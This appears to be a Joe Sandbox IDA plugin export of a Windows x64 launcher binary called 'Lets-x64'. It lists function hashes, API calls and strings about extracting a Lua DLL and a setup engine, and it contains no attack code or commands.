                                                                                                                    • Instruction ID: 9e9a0980193e88985902b761bdd6702db5ca4d7e595ec846726812e2bd39e87c
                                                                                                                    • Opcode Fuzzy Hash: 52b639742314e37657841c789f1007307af1c7c9b1b5e16dccf3db46395a60ee
                                                                                                                    • Instruction Fuzzy Hash: 5781D435A18B83E6E7A88F3494805A96331FF457A4F14423AD62B8F5D0CF3CE556C30A

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcpy$FilePointer_lread$_lclose_lcreat_lwritefreemalloc
                                                                                                                    • String ID: Could not find Lua DLL file size$Failed to alloc memory.$Failed to read Lua DLL$Unable to open Lua DLL file$Unable to write to Lua file.
                                                                                                                    • API String ID: 1949781031-3124031069
                                                                                                                    • Opcode ID: 374f909517fa19264f801e9e43d51d13031991a0c2f6e96994e0c89afccb86b8
                                                                                                                    • Instruction ID: b07661c0eb41c20327aabd73e6125cf2b8820162262b682c14fab02dec0f5754
                                                                                                                    • Opcode Fuzzy Hash: 374f909517fa19264f801e9e43d51d13031991a0c2f6e96994e0c89afccb86b8
                                                                                                                    • Instruction Fuzzy Hash: DC415E35B68B42D3EB949B35E88046A6371FF88B94F404039DA1F8BA64DF3CE559C705

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrlen$Cursorlstrcpy$CompareLoadMessageString
                                                                                                                    • String ID: /~DBG$Launcher Error
                                                                                                                    • API String ID: 4294429971-151238577
                                                                                                                    • Opcode ID: 0a9277867ff730e7b32f19f1c7990337ee8fc1156189be33327bbe5ebcf876f3
                                                                                                                    • Instruction ID: 7d06eeb47da56689ff46b0b4d7060c255f8a1e55630fa7dccb4681a04f5ade3b
                                                                                                                    • Opcode Fuzzy Hash: 0a9277867ff730e7b32f19f1c7990337ee8fc1156189be33327bbe5ebcf876f3
                                                                                                                    • Instruction Fuzzy Hash: 8E513635A58B82C9EBA08F3098451E923B1FF84794F80113AD51FCA6A5DF7CE645CB0A

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errnolstrcpy$AllocFileHeapPointer_callnewh_lclose_lcreat_lread_lwritefreemalloc
                                                                                                                    • String ID: Failed to read setup engine$Unable to open setup file
                                                                                                                    • API String ID: 3486659530-2055280143
                                                                                                                    • Opcode ID: b55acdce389c2c4367aa3d2a605e31da1710affe7b17a6ee5be05dbc7ec7491b
                                                                                                                    • Instruction ID: 7c8f97905bec1e827668060f8a0db906597e2d5546cc546dbe3eb37cc2900e06
                                                                                                                    • Opcode Fuzzy Hash: b55acdce389c2c4367aa3d2a605e31da1710affe7b17a6ee5be05dbc7ec7491b
                                                                                                                    • Instruction Fuzzy Hash: AA31AD35A18B42C6DB948F35E8400B92371EF88BA8F580139DE1F8F7A4DE3CE4858709

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _amsg_exit$CommandInfoInitializeLineStartup__setargv_cinit_wincmdln
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4082634633-0
                                                                                                                    • Opcode ID: ae4916e3b04b3227ea643abd4b60dbc61f966aff544826d16c3a69032035fb30
                                                                                                                    • Instruction ID: 94947d078d768858758a38ccb30f35c30105daea2f717460a08865309f1dfe78
                                                                                                                    • Opcode Fuzzy Hash: ae4916e3b04b3227ea643abd4b60dbc61f966aff544826d16c3a69032035fb30
                                                                                                                    • Instruction Fuzzy Hash: 9B410870E48343C6FAE56B7195223B962B1AF89745F40403DE64FCE2D7EF6CA840865B

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF6688512AC: _lopen.KERNEL32 ref: 00007FF6688512D4
                                                                                                                      • Part of subcall function 00007FF6688512AC: lstrcpyA.KERNEL32(?,00000000,?,00007FF668852066), ref: 00007FF6688512F2
                                                                                                                      • Part of subcall function 00007FF6688512AC: free.LIBCMT ref: 00007FF66885155E
                                                                                                                    • Sleep.KERNEL32 ref: 00007FF6688520AE
                                                                                                                    • DeleteFileA.KERNEL32 ref: 00007FF6688520C4
                                                                                                                    • DeleteFileA.KERNEL32 ref: 00007FF6688520D1
                                                                                                                    • RemoveDirectoryA.KERNEL32 ref: 00007FF6688520DE
                                                                                                                      • Part of subcall function 00007FF6688519B4: GetCurrentDirectoryA.KERNEL32 ref: 00007FF6688519F5
                                                                                                                      • Part of subcall function 00007FF6688519B4: GetTempPathA.KERNEL32 ref: 00007FF668851A11
                                                                                                                      • Part of subcall function 00007FF6688519B4: lstrlenA.KERNEL32 ref: 00007FF668851A1E
                                                                                                                      • Part of subcall function 00007FF6688519B4: lstrcpyA.KERNEL32 ref: 00007FF668851A48
                                                                                                                      • Part of subcall function 00007FF6688519B4: lstrlenA.KERNEL32 ref: 00007FF668851A58
                                                                                                                      • Part of subcall function 00007FF6688519B4: lstrcatA.KERNEL32 ref: 00007FF668851A74
                                                                                                                      • Part of subcall function 00007FF6688519B4: wsprintfA.USER32 ref: 00007FF668851AA2
                                                                                                                      • Part of subcall function 00007FF6688519B4: wsprintfA.USER32 ref: 00007FF668851ABA
                                                                                                                      • Part of subcall function 00007FF6688519B4: DeleteFileA.KERNELBASE ref: 00007FF668851AC7
                                                                                                                      • Part of subcall function 00007FF6688519B4: RemoveDirectoryA.KERNELBASE ref: 00007FF668851AD1
                                                                                                                      • Part of subcall function 00007FF6688519B4: GetFileAttributesA.KERNELBASE ref: 00007FF668851ADB
                                                                                                                      • Part of subcall function 00007FF6688519B4: CreateDirectoryA.KERNELBASE ref: 00007FF668851AEC
                                                                                                                      • Part of subcall function 00007FF6688519B4: lstrcpyA.KERNEL32 ref: 00007FF668851AFB
                                                                                                                      • Part of subcall function 00007FF6688519B4: SetCurrentDirectoryA.KERNELBASE ref: 00007FF668851B06
                                                                                                                      • Part of subcall function 00007FF6688519B4: lstrcpyA.KERNEL32 ref: 00007FF668851B1C
                                                                                                                      • Part of subcall function 00007FF6688519B4: CreateDirectoryA.KERNEL32 ref: 00007FF668851B29
                                                                                                                      • Part of subcall function 00007FF6688519B4: SetCurrentDirectoryA.KERNEL32 ref: 00007FF668851B34
                                                                                                                      • Part of subcall function 00007FF6688519B4: lstrcpyA.KERNEL32 ref: 00007FF668851B49
                                                                                                                      • Part of subcall function 00007FF6688519B4: lstrlenA.KERNEL32 ref: 00007FF668851B59
  • Part of subcall function 00007FF6688519B4: lstrcatA.KERNEL32 ref: 00007FF668851B75
  • Part of subcall function 00007FF6688519B4: lstrcpyA.KERNEL32 ref: 00007FF668851B87
• MoveFileExA.KERNEL32 ref: 00007FF6688520EC
• MoveFileExA.KERNEL32 ref: 00007FF6688520FF
• MoveFileExA.KERNEL32 ref: 00007FF668852112
  • Part of subcall function 00007FF668851578: malloc.LIBCMT ref: 00007FF668851598
  • Part of subcall function 00007FF668851578: SetFilePointer.KERNELBASE ref: 00007FF6688515BB
  • Part of subcall function 00007FF668851578: _lread.KERNEL32(?,?,00000000,00007FF668852082), ref: 00007FF6688515D1
  • Part of subcall function 00007FF668851578: _lcreat.KERNEL32 ref: 00007FF6688515EB
  • Part of subcall function 00007FF668851578: lstrcpyA.KERNEL32(?,?,00000000,00007FF668852082), ref: 00007FF668851603
  • Part of subcall function 00007FF668851578: free.LIBCMT ref: 00007FF66885166A
  • Part of subcall function 00007FF668851578: _lclose.KERNEL32 ref: 00007FF668851676
  • Part of subcall function 00007FF668851694: SetFilePointer.KERNELBASE ref: 00007FF6688516C0
  • Part of subcall function 00007FF668851694: _lread.KERNEL32(?,?,00000000,00007FF668852090), ref: 00007FF6688516D5
  • Part of subcall function 00007FF668851694: lstrcpyA.KERNEL32(?,?,00000000,00007FF668852090), ref: 00007FF6688516EB
  • Part of subcall function 00007FF668851694: malloc.LIBCMT ref: 00007FF668851705
  • Part of subcall function 00007FF668851694: SetFilePointer.KERNELBASE ref: 00007FF668851725
  • Part of subcall function 00007FF668851694: _lread.KERNEL32(?,?,00000000,00007FF668852090), ref: 00007FF668851739
  • Part of subcall function 00007FF668851694: _lcreat.KERNEL32 ref: 00007FF668851755
  • Part of subcall function 00007FF668851694: lstrcpyA.KERNEL32(?,?,00000000,00007FF668852090), ref: 00007FF66885176D
  • Part of subcall function 00007FF668851694: free.LIBCMT ref: 00007FF6688517D6
  • Part of subcall function 00007FF668851C88: wsprintfA.USER32 ref: 00007FF668851D31
  • Part of subcall function 00007FF668851C88: lstrlenA.KERNEL32 ref: 00007FF668851D41
  • Part of subcall function 00007FF668851C88: lstrcatA.KERNEL32 ref: 00007FF668851D58
  • Part of subcall function 00007FF668851C88: lstrcatA.KERNEL32 ref: 00007FF668851D65
  • Part of subcall function 00007FF668851C88: wsprintfA.USER32 ref: 00007FF668851D7D
  • Part of subcall function 00007FF668851C88: lstrcatA.KERNEL32 ref: 00007FF668851D89
  • Part of subcall function 00007FF668851C88: lstrcatA.KERNEL32 ref: 00007FF668851D96
  • Part of subcall function 00007FF668851C88: wsprintfA.USER32 ref: 00007FF668851DAF
  • Part of subcall function 00007FF668851C88: lstrcatA.KERNEL32 ref: 00007FF668851DBB
  • Part of subcall function 00007FF668851C88: lstrcatA.KERNEL32 ref: 00007FF668851DC8
  • Part of subcall function 00007FF668851C88: wsprintfA.USER32 ref: 00007FF668851DE0
  • Part of subcall function 00007FF668851C88: lstrcatA.KERNEL32 ref: 00007FF668851DEC
  • Part of subcall function 00007FF668851C88: lstrcatA.KERNEL32 ref: 00007FF668851DF9
  • Part of subcall function 00007FF668851C88: GetCurrentProcess.KERNEL32 ref: 00007FF668851E04
  • Part of subcall function 00007FF668851C88: OpenProcessToken.ADVAPI32 ref: 00007FF668851E17
  • Part of subcall function 00007FF668851C88: malloc.LIBCMT ref: 00007FF668851E35
Memory Dump Source
• Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
• Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
Similarity
• API ID: Filelstrcat$lstrcpy$Directory$wsprintf$Currentlstrlen$DeleteMovePointer_lreadfreemalloc$CreateProcessRemove_lcreat$AttributesOpenPathSleepTempToken_lclose_lopen
• String ID:
• API String ID: 1722154105-0
• Opcode ID: 5d700d46a4a826c95268ac6175f08a7b044a4c60bc541fb641729bbb9d71854b
• Instruction ID: 3288bed726501db5ea6726368a0595bde53ba482a98c252ae083cf112146414f
• Opcode Fuzzy Hash: 5d700d46a4a826c95268ac6175f08a7b044a4c60bc541fb641729bbb9d71854b
• Instruction Fuzzy Hash: 5F211035A58747C2EB809B31A8112BA23B2AF94B44F894035D50FCF551DF3CE849C709

Control-flow Graph (rendered graph not reproduced; basic blocks 7ff668853d40-7ff668853f9c)
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
• Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
Similarity
• API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
• String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
• API String ID: 2183313154-4022980321
• Opcode ID: 2fd597ed130682cdad83eb5e5509c53fb8165203a3ef8c33a1dd45f2f99eb7af
• Instruction ID: 8b4aa1f400126399a1a2f03c991b3564c8df0922cbe490774a1129542ad29431
• Opcode Fuzzy Hash: 2fd597ed130682cdad83eb5e5509c53fb8165203a3ef8c33a1dd45f2f99eb7af
• Instruction Fuzzy Hash: 6F51A035A08742C1FBA4D735A4156BA63B1AF8A784F44013DEE5FCBA95CF3CE905870A
APIs
Memory Dump Source
• Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
• Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
• String ID:
• API String ID: 3778485334-0
• Opcode ID: def16fc24cee703d4a5537edd1a08e3f5afa767f0e92b5f445a4ac4bfec6e0a8
• Instruction ID: 5692748998e20549c3658bed22593a17a61b02adca2d3b4252ac32e799ec2936
• Opcode Fuzzy Hash: def16fc24cee703d4a5537edd1a08e3f5afa767f0e92b5f445a4ac4bfec6e0a8
• Instruction Fuzzy Hash: 3631D235919B42C5EB909B75F84036A73B4FF84754F50403ADA8E8AB65DF3CE494CB0A
APIs
Memory Dump Source
• Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
• Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: 212812d41cc70271c4644ed950498d631a3e0901e36617f5dee6308be7f1040b
• Instruction ID: 373fd2d73b9a024e53075b5acf139302df9b73a3af04956df3b9303354069fd9
• Opcode Fuzzy Hash: 212812d41cc70271c4644ed950498d631a3e0901e36617f5dee6308be7f1040b
• Instruction Fuzzy Hash: 85314132618B82C6DBA0CB35E8406AE73B4FF85754F500139EA9E87A95DF3CD545CB05
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
• Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: Advapi32.dll$ConvertSidToStringSidA
• API String ID: 145871493-1798845326
• Opcode ID: 1374bef24f75bd89002269a902c2d3815061ff068bd593844a5334fb0b02de96
• Instruction ID: 7ee0df3b6d142b2478d30ad18f9525dcc0a3dd7871417d35abcbb067763b720f
• Opcode Fuzzy Hash: 1374bef24f75bd89002269a902c2d3815061ff068bd593844a5334fb0b02de96
• Instruction Fuzzy Hash: 4FF01D35B19B41C5EA949F76B48012A62B0AF48BD0F888139EE4F9BB54EE3CE8458615
APIs
Memory Dump Source
• Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
• Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
Similarity
• API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
• String ID:
• API String ID: 1445889803-0
• Opcode ID: 45f2579fbe85fb05cdb622c58f7eecb08a7dcc8e069338e3c73b3b5a557e8f9d
• Instruction ID: e8682f92c825aa77f40a48db188569d772728bb25f417cfc0122c60997015f00
• Opcode Fuzzy Hash: 45f2579fbe85fb05cdb622c58f7eecb08a7dcc8e069338e3c73b3b5a557e8f9d
• Instruction Fuzzy Hash: C5015E31669B01C1EBD08F32E8402666371FF49B91F442639EE5F8BBA4DE3CD8998705
APIs
Memory Dump Source
• Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
• Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: bbde7a5f8c646a9abf88cbaeb42008ad304d5913e347a707f2b19ea3527e0825
• Instruction ID: 1d4ae61e6f3dbd5305bd524084fa6ce55014a87b75d5a862051061d39780a3b1
• Opcode Fuzzy Hash: bbde7a5f8c646a9abf88cbaeb42008ad304d5913e347a707f2b19ea3527e0825
• Instruction Fuzzy Hash: B7B09224EA9542C1D684AB319C8506122B06F98301FC10435C00EC9120DE5C91AB8705

Control-flow Graph (rendered graph not reproduced; basic blocks 7ff668856424-7ff668856811, block 7ff66885642d-7ff668856810 calls 7ff668852a80 86 times)
APIs
Memory Dump Source
• Source File: 00000000.00000002.2187622940.00007FF668851000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668850000, based on PE: true
• Associated: 00000000.00000002.2187604204.00007FF668850000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2187646259.00007FF668858000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2187666475.00007FF66885C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2187699506.00007FF66885F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff668850000_Lets-x64.jbxd
Similarity
• API ID: free$ErrorFreeHeapLast_errno
• String ID:
• API String ID: 1012874770-0
• Opcode ID: 38c5fe463394c08e12a9a6354ee852dc3d8d4bc07c49ae58647bb7e9c07ea56b
• Instruction ID: 900a473126b4cbf7e56b13f01ef7eda1b18d2b6bb77608711368990b314e975d
• Opcode Fuzzy Hash: 38c5fe463394c08e12a9a6354ee852dc3d8d4bc07c49ae58647bb7e9c07ea56b
• Instruction Fuzzy Hash: AFA1643261A647C1EAA2AA31D9952FD2330AF88B44F044136DA4F8E1A7CF18D84583D6

Control-flow Graph

APIs
• LoadLibraryW.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855DDD
• GetProcAddress.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855DF9
• EncodePointer.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855E0B
• GetProcAddress.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855E22
• EncodePointer.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855E2B
• GetProcAddress.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855E42
• EncodePointer.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855E4B
• GetProcAddress.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855E62
• EncodePointer.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855E6B
• GetProcAddress.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855E8A
• EncodePointer.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855E93
• DecodePointer.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855EC6
• DecodePointer.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855ED6
• DecodePointer.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855F2C
• DecodePointer.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855F4D
• DecodePointer.KERNEL32(?,?,?,00000000,00007FF668853FD4,00007FF668852E80), ref: 00007FF668855F67
Strings
Similarity
• API ID: Pointer$AddressDecodeEncodeProc$LibraryLoad
• String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
• API String ID: 2643518689-564504941
• Opcode ID: 377389066e194beb257b6cc4c990508dbe9e31df47bede6a1fcbae8ebeac0d24
• Instruction ID: 881eab4b2f17b47b6a1600f314cdeaa5a50ebdcb04d499a3eb788fb63d0f4a48
• Opcode Fuzzy Hash: 377389066e194beb257b6cc4c990508dbe9e31df47bede6a1fcbae8ebeac0d24
• Instruction Fuzzy Hash: E551F531A6AB03C1EED59B71B81417A23B0AF48B85F44153EDD0FCA7A4EE3CB545830A

Control-flow Graph

APIs
Similarity
• API ID: free$ErrorFreeHeapLast__free_lconv_mon__free_lconv_num_errno
• String ID:
• API String ID: 518839503-0
• Opcode ID: d6fa53e174e6b918517e515ba8aa7a722c480d1c0c30cd535f337a27a34034e8
• Instruction ID: 012d5e8c6054362d76f30addde48182a6b0806a512cb43ead9c169bb97bfa2b8
• Opcode Fuzzy Hash: d6fa53e174e6b918517e515ba8aa7a722c480d1c0c30cd535f337a27a34034e8
• Instruction Fuzzy Hash: 1141CB32E0A742C5EEE5DF71D5503B923B1AF88B94F184439DA0F8E295CF6CA491835A
APIs
Similarity
• API ID: ByteCharMultiStringWide$_errnofreemalloc$AllocHeap_callnewh
• String ID:
• API String ID: 1080698880-0
• Opcode ID: 06b358e6a8dfdad4ae1c8f4e6ae3763ba8e01f825429bf13183ac54123346ef6
• Instruction ID: af39556a2bdc2122162b28e7a3a9fbff768f06966a3e56824c56217104d66648
• Opcode Fuzzy Hash: 06b358e6a8dfdad4ae1c8f4e6ae3763ba8e01f825429bf13183ac54123346ef6
• Instruction Fuzzy Hash: 1E817F32A08782C6EBA58F35984016A77B5FF487A4F544239DB5E8BBD4DF3CE8418709
APIs
Similarity
• API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockfreemalloc
• String ID:
• API String ID: 113790786-0
• Opcode ID: 58324cbb415507639f68647bb86c879729a4a0b96829e5bcb854d5795d216430
• Instruction ID: 39a62744ab07442e6b1425c9bde0f83bc5acafe73755d2e0ba73bf282e482ee2
• Opcode Fuzzy Hash: 58324cbb415507639f68647bb86c879729a4a0b96829e5bcb854d5795d216430
• Instruction Fuzzy Hash: 2F213D31E58742C2F6E5AB70B40577A6275AF89784F44503DE54FCE6C6CF3CA840870A
APIs
Similarity
• API ID: CountCriticalFileInfoInitializeSectionSleepSpinStartupType
• String ID:
• API String ID: 3473179607-0
• Opcode ID: 373c3526b53370dd1b29be18ffebb9d8967604d272333215ec38941ab4ba2182
• Instruction ID: 5a5fba6143ae3aac150dcb202f529f1145dcf7588bec14f384c76323d5c24768
• Opcode Fuzzy Hash: 373c3526b53370dd1b29be18ffebb9d8967604d272333215ec38941ab4ba2182
• Instruction Fuzzy Hash: 2C816FB1A09B82C5EBA48F35955432967B0FF84B64F544339CA7F8A2D4DF38E465C30A
APIs
Similarity
• API ID: DecodePointer$ExitProcess_amsg_exit_lock
• String ID:
• API String ID: 3411037476-0
• Opcode ID: b53e1919d0650db1d1152386284e4e42a7a0349e1a739623efed4da8177e2040
• Instruction ID: 2cbdcba4301a80b18d0247ebd9156b01af8a2baa2bf481a4f188a3086f909740
• Opcode Fuzzy Hash: b53e1919d0650db1d1152386284e4e42a7a0349e1a739623efed4da8177e2040
• Instruction Fuzzy Hash: 8C413C31AA9B42C1EAD09B31F84413962B5BF88B84F14443DE98FCB7A5DF7CE455870A
APIs
Similarity
• API ID: free$_amsg_exit_errno_getptd$ErrorFreeHeapLastSleep_lockmalloc
• String ID:
• API String ID: 3894533514-0
• Opcode ID: 286a05b5a7774a520a07d95891b3d4818651d0f49d1d563932e00a541e4ffacf
• Instruction ID: b98eb95cc9d3c3991fda18a50468971c8860a2ab6adc068b1025de454ff65af9
• Opcode Fuzzy Hash: 286a05b5a7774a520a07d95891b3d4818651d0f49d1d563932e00a541e4ffacf
• Instruction Fuzzy Hash: A9518A36A08742C6E6A49B35A4502797AB1BF84B54F14413ADA5F8B396CF7CE441C70B
APIs
Similarity
• API ID: EnvironmentStrings$ByteCharFreeMultiWide$free
• String ID:
• API String ID: 517548149-0
• Opcode ID: fa985a46b7b6b7dcc0d461bbfdd9414ad58848c2d79c013f089396c8cb6bbb3d
• Instruction ID: d91d81bf83659a15ff6f51c0af310d6a58a6dfadc5df4bfef8a9dbe418a77904
• Opcode Fuzzy Hash: fa985a46b7b6b7dcc0d461bbfdd9414ad58848c2d79c013f089396c8cb6bbb3d
